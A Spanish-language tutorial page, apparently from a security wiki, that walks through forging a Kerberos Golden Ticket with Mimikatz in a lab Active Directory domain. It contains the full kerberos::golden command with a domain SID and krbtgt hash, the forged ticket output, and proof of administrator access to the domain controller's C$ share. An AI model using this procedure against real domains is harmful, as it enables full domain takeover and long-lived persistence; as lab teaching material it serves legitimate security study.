Golden Ticket tradicional utilizando Mimikatz

Es importante realizar lectura primero sobre Bosques y relaciones de confianza

Vamos a partir de una sesion limpia de tickets que al ejecutar el siguiente comando sale lo siguiente:

PS C:\Users\regular.user> klist

Current LogonId is 0:0x24f19b8

Cached Tickets: (0)

PS C:\Users\regular.user> dir \\First-DC.spartancybersec.corp\c$
dir : Access is denied
At line:1 char:1
+ dir \\First-DC.spartancybersec.corp\c$
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (\\First-DC.spartancybersec.corp\c$:String) [
   Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : ItemExistsUnauthorizedAccessError,Microsoft.PowerShell.Commands
   .GetChildItemCommand

dir : Cannot find path '\\First-DC.spartancybersec.corp\c$' because it does not exist.
At line:1 char:1
+ dir \\First-DC.spartancybersec.corp\c$
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (\\First-DC.spartancybersec.corp\c$:String) [Ge
   t-ChildItem], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

El comando que utilizaremos es:

PS C:\Users\admin\Desktop\SHARED> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # kerberos::golden /user:Administrator /domain:spartancybersec.corp /sid:S-1-5-21-1861162130-2580302541-221646211 /krbtgt:b44daa015f201fa31126895ebbcbbcab /ticket:evil.tck /ptt
User      : Administrator
Domain    : spartancybersec.corp (SPARTANCYBERSEC)
SID       : S-1-5-21-1861162130-2580302541-221646211
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: b44daa015f201fa31126895ebbcbbcab - rc4_hmac_nt
Lifetime  : 11/22/2023 11:41:28 PM ; 11/19/2033 11:41:28 PM ; 11/19/2033 11:41:28 PM
-> Ticket : ** Pass The Ticket **

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Golden ticket for 'Administrator @ spartancybersec.corp' successfully submitted for current session

mimikatz # exit
Bye!

Despues podemos validar nuestros tickets:

PS C:\Users\admin\Desktop\SHARED> klist

Current LogonId is 0:0x24f1977

Cached Tickets: (1)

#0>     Client: Administrator @ spartancybersec.corp
        Server: krbtgt/spartancybersec.corp @ spartancybersec.corp
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
        Start Time: 11/22/2023 23:41:28 (local)
        End Time:   11/19/2033 23:41:28 (local)
        Renew Time: 11/19/2033 23:41:28 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

Y para validar el exito de nuestro ticket podemos utilizar el siguiente comando:

PS C:\Users\admin\Desktop\SHARED> dir \\First-DC.spartancybersec.corp\c$

    Directory: \\First-DC.spartancybersec.corp\c$

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       11/14/2018   6:56 AM                EFI
d-----       11/18/2023   4:22 PM                NTDS
d-----        5/13/2020   5:58 PM                PerfLogs
d-r---        9/19/2022  11:23 PM                Program Files
d-----        9/19/2022  11:47 PM                Program Files (x86)
d-r---        9/19/2022  11:40 PM                Users
d-----       11/21/2023   1:27 AM                Windows

AnteriorVariantes del Golden Ticket SiguienteGolden Ticket Inter-realm TGT

Última actualización hace 1 año

¿Te fue útil?